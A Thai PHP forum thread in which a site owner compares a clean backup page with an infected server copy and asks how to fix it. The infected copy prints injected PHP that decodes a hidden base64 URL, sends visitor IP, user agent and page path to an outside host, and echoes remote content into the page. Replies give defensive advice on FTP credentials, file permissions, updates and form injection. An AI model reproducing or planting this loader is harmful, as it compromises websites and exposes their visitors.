|
|
|
Virus PHP ใครเคยโดนบ้างครับ และขอวิธีทางแก้ใขหน่อยครับ |
|
|
|
|
|
|
|
อันนี้คือ โคดที่ Backup เอาไว้
Code (PHP)
<?php
include("chksession.php");
include("include/config.php");
include("include/date_time_lib.php");
include("include/a_lib.php");//
include("include/b_lib.php");//
include("include/c_lib.php");//
include("include/connect_jan.php");
include("include/connect.php");
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620" />
<link rel="shortcut icon" href="images/favicon.ico">
<META name="description" content="<?php echo $description;?>">
<META name="keywords" content="<?php echo $keywords;?>">
<title><?=$title_text ?></title>
<link href="stye01.css" rel="stylesheet" type="text/css" />
<link rel="stylesheet" href="style.css" type="text/css" media="screen" />
<script type="text/javascript">var _siteRoot='index.php',_root='index.php';</script>
<script type="text/javascript" src="js/jquery.js"></script>
<script type="text/javascript" src="js/scripts.js"></script>
<script type="text/javascript" src="include/myajax.js"></script>
<script type="text/javascript" src="include/setNextFocus.js"></script>
<script src="Scripts/swfobject_modified.js" type="text/javascript"></script>
<style type="text/css">
<!--
#new_03 td table tr td #text_detail_new p strong {
font-weight: bold;
}
.style1 {
color: #FFFFFF;
font-weight: bold;
}
-->
</style>
อันนี้ดาว์โหลดมาจาก Server
Code (PHP)
<?php
include("chksession.php");
include("include/config.php");
include("include/date_time_lib.php");
include("include/a_lib.php");//
include("include/b_lib.php");//
include("include/c_lib.php");//
include("include/connect_jan.php");
include("include/connect.php");
?><?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620" />
<link rel="shortcut icon" href="images/favicon.ico">
<META name="description" content="<?php echo $description;?>">
<META name="keywords" content="<?php echo $keywords;?>">
<title><?=$title_text ?></title>
<link href="stye01.css" rel="stylesheet" type="text/css" />
<link rel="stylesheet" href="style.css" type="text/css" media="screen" />
<script type="text/javascript">var _siteRoot='index.php',_root='index.php';</script>
<script type="text/javascript" src="js/jquery.js"></script>
<script type="text/javascript" src="js/scripts.js"></script>
<script type="text/javascript" src="include/myajax.js"></script>
<script type="text/javascript" src="include/setNextFocus.js"></script>
<script src="Scripts/swfobject_modified.js" type="text/javascript"></script>
<style type="text/css">
<!--
#new_03 td table tr td #text_detail_new p strong {
font-weight: bold;
}
.style1 {
color: #FFFFFF;
font-weight: bold;
}
-->
</style>
ผมของไวรัส คือ เปิดด้วย IE ไม่ได้
Tag : PHP
|
|
|
|
|
|
Date :
2012-05-23 16:39:53 |
By :
Professer |
View :
1576 |
Reply :
6 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
คุณน่าจะต้องตรวจสอบไฟล์ทั้งหมดบน Server รวมทั้งเปลี่ยนโปรแกรม FTP / รหัสผ่านต่าง ๆ ให้หมดครับ
|
|
|
|
|
Date :
2012-05-23 16:45:28 |
By :
mr.win |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
เวลาจะ FTP อย่าเก็บ User/Pass เอาไว้ที่เครื่องครับ ให้กรอกใหม่ทุกครั้ง เพราะ โปรแกรม FTP ทั้งหลายโดยเจาะได้ง่ายครับ
เพื่อความปลอดภัยเพราะ ผมก็โดนมาก่อน โดนเจาะระบบจาก โปรแกรม FTP
จึงเตือนมาเพื่อทราบ ตอนนี้ก็ให้ทำการตรวจสอบไฟล์ ต่างๆ บบ Server ทุกไฟล์ด้วยครับ แล้วทำการแก้ไขซะ
|
|
|
|
|
Date :
2012-05-24 09:27:11 |
By :
kamuro |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
ยิ่งถ้า FTP ผ่านการ Crack มา จะบอกว่ามันเสี่ยงสูงมากครับ
|
|
|
|
|
Date :
2012-05-24 09:39:19 |
By :
mr.win |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
ขอบคุณมากครับ
|
|
|
|
|
Date :
2012-05-26 23:01:57 |
By :
Professer |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
FTP ถึงไม่เก็บ Pass แต่กรอกใหม่ทุกครั้งก็โดนได้อยู่ดีถ้า จะโดนโจมตีที่เครื่องตัวเอง และบางส่วนที่ไม่เซพไว้มันก็เก็บอยู่อีกส่วนแยกกัน จะใช้ตัวฟรีอย่าง FileZilla ก็โดนง่ายเพราะเก็บพาสแบบ text ธรรมดา ตรวจสอบ anti virus ในเครื่องว่าทำงานและอัพเดทเสมอๆ
เปลี่ยน password FTP บ่อยๆ
เสริมให้จากท่านข้างบน ปัญหาที่อาจทำให้เจอโดนแก้ไข code
1. ใช้ opensource บางส่วนหรือทั้งหมดใน code เพราะ open source ที่แจกบางอันมันมีช่องโหว่ ยิ่งอันไหนคนใช้เยอะยิ่งโดนง่าย ทางแก้ หมั่น อัพเดท opensource ที่นำมาใช้ทุกตัวตลอดเวลา
2. ปรับ permission ให้เหมาะกับไฟล์ หากใช้ Linux base แล้วเอาง่ายปรับ 777 (read write exc) หมดทุกไฟล์คุณมีสิทธิ์โดนได้โดยง่าย ควรเลือกปรับบางไฟล์ที่จำเป็นต้องมีการเขียนหรืออัพเดทผ่านจากหน้าเว็บเท่านั้น นอกนั้น ปรับ read only (อันนี้ต้องลองปรับดู หลายๆ host user ในการเรียกใช้งาน เว็บกับ FTP คนละ user ก็ต้องปรับให้ถูกจะ 644 หรืออะไรก็ปรับไปตาม host หรือสอบถามการปรับจากผู้ดูแลก็จะช่วยได้มาก
3. พยายามตรวจสอบ code ในส่วนที่สามารถรับส่งค่าได้ระหว่างหน้า เช่น form ต่างๆ ว่ามีการระวังเรื่อง Injection (double quote,quote ฯลฯ) ไว้ดีหรือยัง เพราะอาจเป็นช่องให้ถูกเจาะผ่าน form ที่ไม่ได้ระวังไว้
|
|
|
|
|
Date :
2012-05-27 08:13:23 |
By :
ekaja |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
ช่วยยืนยันด้วยครับ Open Source นี่แหละตัวดีเลยครับ ยิ่งเป็น Version ที่เก่า ๆ ไม่เคย Update นี่โดนกันเกือบทุกรายครับ
|
|
|
|
|
Date :
2012-05-27 11:53:19 |
By :
mr.win |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Load balance : Server 02
|